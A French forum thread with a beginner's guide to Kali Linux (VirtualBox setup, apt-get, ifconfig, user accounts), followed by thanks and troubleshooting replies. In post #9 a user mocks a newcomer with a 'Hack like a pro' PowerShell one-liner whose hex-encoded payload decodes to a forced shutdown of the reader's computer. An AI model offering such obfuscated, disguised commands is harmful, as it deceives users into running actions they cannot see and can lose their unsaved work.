Annonce

Réduire
Aucune annonce.

[Kali Linux] I - Guide de Démarrage au Pentesting

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • Tutoriel [Kali Linux] I - Guide de Démarrage au Pentesting

    Kali Linux

    Bonjour à tous et toutes,

    Kali linux est un Framework qui est utilisé pour Pen-tester ou pénétrer un système.

    Après l'installation on est un peu perdus lorsque l'on débute et j'ai choisis ce petit lexique que je me suis fait à partir du Book Anglais Master Kali Linux. J'ai vus beaucoup de questions et de demande d'aide après avoir installer Kali je vous remets ce guide qui vous permettra d'avancer un bout de chemin vers compréhension.

    Bien vous avez installé Kali et vous voila arrivé sur le bureau. Vous avez un onglet application en haut, vous aurez en passant dessus avec la souris tous les Tools en dépôts.


    A côté un autre onglet raccourcis qui vous permettra d'aller fouiller dans les dossiers et fichiers qui composent kali.


    Poussez encore à droite l'onglet navigateur (Iceweasel le FF linux)


    puis juste à droite si vous cliquez dessus le terminal pour tapez nos lignes de commandes.


    Vous aurez souvent à l'utiliser alors même si je donne des bases pour se débrouiller il faudra vous mettre à linux à un moment ou à un autre sinon vous serez larguez.

    Je rappelle pour installer Kali en virtualisation : (VirtualBox)ou VMware Tools (VMware).

    Une fois que la machine est créée, le démarrer. Le premier départ sera nous invite à sélectionner un disque. Sélectionnez Kali
    ISO et démarrer l'installation. Les étapes restantes sont identiques à celles de l'installation à double amorçage.
    Une fois l'installation terminée et le bureau chargé, nous pouvons installer l'invité Virtual Box
    Ajouts. Suivez ces étapes pour installer les additions client.Ce sont des pilotes à installer dans la machine virtuelle qui améliorent le fonctionnement.
    Ouvrez un terminal et tapez les codes suivants :

    Code:
    apt-get update
    1. Copiez les fichiers à l'emplacement suivant:
    Code:
    cp /media/cd-rom/VBoxLinuxAdditions.run /root/
    2. Définissez l'autorisation de fichier comme suit:
    Code:
    chmod 755 /root/VBoxLinuxAdditions.run
    3. Exécutez la commande suivante:
    Code:
    cd /root
    Code:
    ./VBoxLinuxAdditions.run
    Autre méthode pour installer :

    ouvrir un nouveau Terminale:

    Code:
    sudo apt-get update
    Code:
    sudo apt-get install build-essential linux-headers
    Code:
    sudo apt-get install virtualbox-ose-guest-x11
    Lancer ensuite sur ok et redemarrer

    Vous aurez par exemple accès à de meilleurs résolutions écrans :

    Comment visualiser la dimension écran :

    ouvrir un Terminal.

    mettre :

    Code:
    sudo su
    Code:
    xrandr

    on aura un aperçu de toute les résolutions écrans et on a plus qu'a en choisir une qui nous convienne avec la commande :

    Code:
    xrandr -s 800x600
    par exemple choisissez une autre sinon.

    Comprendre l'organisation de la mémoire :
    Kali suit une structure de répertoire qui est semblable à Linux basée sur Ubuntu. Les parties importantes à surveiller sont les suivantes:
    • / etc / Contient les fichiers de configuration des outils installés
    • / opt / Contient Metasploit et ses modules pertinents
    • / sys / Contient les fichiers de configuration du matériel et des interfaces externes
    • / root / C'est le répertoire de l'utilisateur root
    • / lib / Contient les bibliothèques dépendant du système d'exploitation

    Voila déjà vous avez fait un petit bout de chemin mais attention ce n’est pas finis encore un petit effort.

    Dans un premier temps, Kali doit être patché régulièrement afin de s'assurer que le système et les applications d'exploitation de base sont à jour et que les correctifs de sécurité ont été appliqués.

    Votre Framework Kali vous l'aurez surement installer sous Débian.

    Le système de gestion des paquets de Debian repose sur les applications fournies discrètes appelées paquets
    . Les paquets peuvent être installés ou retirés par l'utilisateur pour personnaliser l'environnement, et les tâches de soutien tels que des tests de pénétration. Ils peuvent également étendre les fonctionnalités de Kali, l'appui des tâches, telles que les communications (Skype, messagerie instantanée et e-mails sécurisés) ou de la documentation (OpenOffice et Microsoft Office, sous Wine). Les Paquets sont stockés ensuite dans les dépôts et sont téléchargés à l'utilisateur du système pour assurer l'intégrité de l'ensemble.


    Code:
    apt-get update && apt-get dist-upgrade
    Ceci met à jour tous les paquets installés sur le système et de leurs dépendances. Il supprime également les paquets obsolètes du système.

    Dpkg

    Dpkg est le système de gestion de paquets de Debian. Cette application en ligne de commande est utilisé pour installer, supprimer les paquets de requête. En général, dpkg exécute des actions sur les packets individuels.

    Utilisation de APT Outils avancés :
    Intégration avancée Outils (APT), étendent les fonctionnalités de dkpg en recherchant des dépôts et l'installation ou la mise à niveau des paquets avec toutes les dépendances nécessaires. L'APT peut également être utilisé pour mettre à niveau une distribution complète.

    Les plus connus et ceux que vous utiliserez le plus souvent seront:
    Code:
    apt-get update
    Ceci permet de resynchroniser les fichiers d'index de paquets locaux avec leur source tel que défini dans / etc / apt / sources.list. La commande de mise à jour doit toujours être utilisé en premier, avant d'effectuer une mise à niveau ou dist-upgrade.

    Code:
    apt-get upgrade
    Ceci est utilisé pour installer les dernières versions de tous les paquets installés sur le système en utilisant le fichier / etc / apt / sources.list. Les paquets qui sont installés sur Kali avec de nouvelles versions sont mises à jour. La commande de mise à niveau ne sera pas modifier ou supprimer les paquets qui ne sont pas mis à niveau, et il ne sera pas installer des paquets qui ne sont pas déjà présents.

    Votre ip ?

    Code:
    ifconfig
    Code:
    ifconfig -a
    vous permettra de visualiser votre ip local,masque réseau,etc...
    Il est similaire à ipconfig de windows.

    Il y a des variantes :
    Code:
    ifconfig eth0
    Mais bon on rester sur les bases.
    Sinon tapez :
    Code:
    ifconfig --help
    Vous aurez un aperçus des options de ifconfig.

    Bien à l'installation vous avez choisis un mot de passe sachez que l'on peut le changer à tout moment.
    Ouvrez un terminal et tapez dedans :

    Code:
    passwd root
    Vous aurez à rentrer fois le même pour confirmer puis il deviendra votre nouveau mdp root par défaut alors notez le bien si vous effectuer cette opération

    Ajout d'un utilisateur non-root

    L'Ajout d'un utilisateur non-root est utile car la plupart des applications fournies dans Kali doivent s'exécuter avec des privilèges de niveau root(penser admin) afin de fonctionner. Cela peut être un souci de sécurité. Dans certains cas, il est préférable de tester avec des privilèges de niveau utilisateur. En fait, on va forcer certaines utilisations en non-root.Pour créer un utilisateur non-root, vous pouvez simplement utiliser la commande
    Code:
    adduser
    du terminal et suivez les instructions qui apparaissent.

    2 Dernières commandes qui peuvent vous aider :

    Code:
    clear
    vide de tous commentaires le terminale.
    Code:
    reboot
    Eteint et relance Kali

    Cela est peu mais si cela sert vraiment je complèterais au fur et à mesure sur les utilisations de bases de Kali. Installer des paquets , retrouver un fichier , son chemin.Ainsi que des packages sympas pour améliorer Kali , thèmes pour personnaliser Kali et bien d'autres.Au bout d'un certain temps vous verrez qu'une fois compris L'utilisation de Kali vous vous amuserez bien.
    Dernière modification par DreAmuS, 18 juillet 2014, 19h29.

  • #2
    Envoyé par DreAmuS Voir le message

    Comprendre l'organisation de la mémoire :
    Kali suit une structure de répertoire qui est semblable à Linux basée sur Ubuntu. Les parties importantes à surveiller sont les suivantes:
    • / etc / Contient les fichiers de configuration des outils installés
    • / opt / Contient Metasploit et ses modules pertinents
    • / sys / Contient les fichiers de configuration du matériel et des interfaces externes
    • / root / C'est le répertoire de l'utilisateur root
    • / lib / Contient les bibliothèques dépendant du système d'exploitation

    J'adore
    Est-ce que tu sais où on pourrait trouver davantage de documentation?
    C'est pas facile de trouver une bonne documentation bien construite.

    Voire peut-être aussi une documentation pour Windows?

    Commentaire


    • #3
      Merci

      A part sur Kali Linux le site officiel.Ensuite je ne pratique que sur Linux. Windows je possède qu'un Pc Portable dessus et je m'en sert que pour grapher et regarder du stream.

      Je peux en fouillant trouver des PDF(je doit en avoir une bonne dizaine sur Kali) puis les héberger sur Kali mais ce sera également sur Linux. Je n'ai rien sur Windows personnellement.

      Sache que je compte continuer sur Kali en dévoilant au fur et à mesure toutes les ressources que la plateforme possède.

      Ensuite, je parlerais des scripts additionels qui tourne sur le net et de leurs possibilités en les ajoutant à Kali. Par contre je serais absent tout le mois d'Aout à cause de mon stage de validation donc il y aura une coupure de plus d'un mois entre.
      Dernière modification par DreAmuS, 29 juillet 2014, 23h18.

      Commentaire


      • #4
        Salut !

        J'adore ta façon d'écrire ! Nouveau ( et perdu sur kali ), je trouves très compréhensible tes infos ! Plus qu'à lire tes autres chapitres et me faire des penses-bêtes !

        Merci du temps que tu nous consacre à nous, les débutants.

        Commentaire


        • #5
          Bonjour,
          Petit problème des le départ, ça risque d'être compliqué pour la suite^^
          Je ne peux pas vous envoyer le screen du problème donc vous allez avoir du mal a comprendre mais bon^^.

          J'ai installé Kali Linux et je l'ouvre via une machine virtuelle via VirtualBox.

          Je tape dans le terminal la commande "cp /media/cd-rom/VBoxLinuxAdditions.run /root
          et il me répond "cp: cannot stat '/media/cd-rom/VBoxLinuxAdditions.run': No such file or directory"
          Sachant que la première commande que vous nous dites de taper fonctionne correctement.

          Commentaire


          • #6
            merci pour ce cours

            Commentaire


            • #7
              Hello Roy_Adrien,

              Alors tu nous dis que :

              Envoyé par Roy_Adrien Voir le message
              il me répond "cp: cannot stat '/media/cd-rom/VBoxLinuxAdditions.run': No such file or directory"
              Alors d'après ce que ton terminal te renvoie il semblerai que le fichier ou le dossier en question n'existe pas.

              Bien que je ne sois pas un expert de Virtual Box j'ai quelques idées pouvant expliquer cette erreur.
              Tout d'abord est-ce que tu as bien inséré le CD virtuel correspondant via l'onglet "Devices" de Virtual Box ?

              Si oui (et là c'est juste une supposition) peut être que le nom du fichier, du ou des dossiers en question ont changés depuis 2014, dans ce cas vérifie le ou les nouveaux nom et remplace les dans la ligne de commande, ça devrait régler le problème.

              Enfin si ces 2 dernières solutions ne résolvent pas ce problème, là je sèche.

              J'espère avoir éclairé ta lanterne.

              Ronaiim.

              Commentaire


              • #8
                Salut Ronaiim,
                Quel CD virtuel?^^

                Commentaire


                • #9
                  Envoyé par Roy_Adrien Voir le message
                  ça risque d'être compliqué pour la suite^^
                  . En effet.
                  Hack like a pro :
                  PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

                  Commentaire


                  • #10
                    Envoyé par Krisscool Voir le message

                    . En effet.
                    ahah yes^^

                    Commentaire

                    Chargement...
                    X